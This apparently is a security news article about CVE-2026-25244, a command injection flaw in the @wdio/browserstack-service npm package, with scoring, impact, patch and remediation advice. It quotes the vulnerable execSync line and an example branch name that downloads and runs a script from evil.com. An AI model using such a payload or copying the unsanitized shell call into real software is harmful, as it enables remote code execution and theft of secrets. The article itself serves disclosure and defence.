A critical command injection vulnerability tracked as CVE-2026-25244 has been discovered in the widely used @wdio/browserstack-service npm package.
Allowing attackers to achieve remote code execution (RCE) on CI/CD servers and developer machines by exploiting unsanitized git branch names during test orchestration. With a CVSS score of 9.8 (Critical), every engineering team using WebdriverIO versions ≤ 9.23.2 must patch immediately.
WebdriverIO is a battle-tested, open-source test automation framework that supports unit, end-to-end, and component testing via the WebDriver, WebDriver BiDi, and Appium protocols.
Critical RCE Flaw Hits WebdriverIO BrowserStack
The @wdio/browserstack-service plugin, downloaded millions of times across enterprise DevOps pipelines, extends WebdriverIO with BrowserStack integration for cross-browser testing and smart test orchestration.
This attack surface is significant: CI/CD environments typically run with elevated permissions and store sensitive secrets such as SSH keys, API tokens, and environment credentials, making them prime targets for supply chain attacks.
The root cause lies in a single line of code in helpers.ts the test orchestration helper file at webdriverio/packages/wdio-browserstack-service/src/testorchestration/helpers.ts (Line 204). The offending code directly interpolates user-controlled git branch names into a Node.js execSync() shell call:
const changedFilesOutput = execSync(git diff --name-only ${baseBranch}..${currentBranch}).toString().trim()Git legitimately permits branch names containing shell metacharacters such as semicolons, backticks, and ${IFS} sequences.
The getGitMetadataForAISelection() function, responsible for gathering AI-selection metadata during smart test runs, retrieves the branch name and passes it directly to the shell without any sanitization or escaping, a textbook CWE-78 (OS Command Injection) weakness.
The exploit chain is dangerously straightforward and requires no authentication. An attacker crafts a malicious git repository with a weaponized branch name, such as:
git checkout -b "main;curl${IFS}evil.com/evil.sh${IFS}>/tmp/evil.sh;bash${IFS}/tmp/evil.sh;echo${IFS}PWNED"The attacker then configures WebdriverIO to point to this repository via testOrchestrationOptions.runSmartSelection.source.
Critically, if the source field is omitted entirely, the service defaults to the current working directory, meaning any developer who clones a poisoned repository and runs npm run wdio is instantly vulnerable without any special configuration.
When test orchestration triggers getGitMetadataForAISelection(), the shell interprets the malicious payload embedded in the branch name and executes attacker-controlled commands.
The vulnerability scores a maximum of 9.8 on the CVSS v3.1 scale, reflecting its severity across all impact dimensions.
| CVSS Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
The CVSS vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. The “Privileges Required: None” and “User Interaction: None” ratings make this especially alarming an attacker needs neither a foothold in the target environment nor any victim action beyond the standard npm run wdio command.
Successful exploitation delivers a devastating range of outcomes across the software development lifecycle. Attackers can steal environment variables, API keys, secrets, and credentials stored on the CI/CD runner.
Beyond secret theft, adversaries can exfiltrate source code and SSH keys, install persistent backdoors, perform lateral movement within internal networks, and, most dangerously, tamper with build artifacts to poison downstream software distributions in a classic supply chain attack.
Given the widespread adoption of WebdriverIO in enterprise QA pipelines, the blast radius of a targeted campaign exploiting this flaw could span entire software supply chains.
Affected Versions
All @wdio/browserstack-service versions <= 9.23.2 are vulnerable. The flaw was responsibly disclosed via GitHub Security Advisory GHSA-5c46-x3qw-q7j7, published on May 11, 2026, by maintainer erwinheitzman, with credit to reporter hayageek.
The patch was released in version 9.24.0, which properly sanitizes git branch names before they are interpolated into shell commands.
Remediation
Take the following actions immediately to protect your environment:
- Upgrade now: Run
npm install @wdio/browserstack-service@^9.24.0to patch the vulnerability - Audit your
wdio.conf.js: Review alltestOrchestrationOptions.runSmartSelection.sourceentries for untrusted repository paths - Sanitize branch names: Implement allow-listing or regex validation for git branch names in any internal tooling that passes them to shell commands
- Restrict CI/CD permissions: Test runners with the least-privileged service account to limit the blast radius of any future RCE
- Monitor for anomalies: Deploy Sigma detection rules to flag suspicious
execSync-triggered process spawning on CI runners - Scan your pipeline: Use tools like
npm auditand SAST scanners to detect any lingering versions of the vulnerable package
FAQ
Q1: What is CVE-2026-25244?
It is a critical (CVSS 9.8) command injection flaw in @wdio/browserstack-service ≤ 9.23.2 that allows unauthenticated remote code execution via maliciously named git branches.
Q2: Do I need to be using a malicious repository to be exploited?
No, if you omit the source field in runSmartSelection, the service defaults to the current directory, making any poisoned cloned repo an attack vector.
Q3: How do I fix the vulnerability?
Upgrade @wdio/browserstack-service to version 9.24.0 or later, which sanitizes branch names before shell interpolation.
Q4: Can this vulnerability be exploited in automated CI/CD pipelines without human interaction?
Yes, the flaw requires no user interaction or privileges, making it fully exploitable in automated pipeline environments with no manual steps.
Site: thecybrdef.com
For more insights and updates, follow us on Google News, Twitter, and LinkedIn.
About the Author
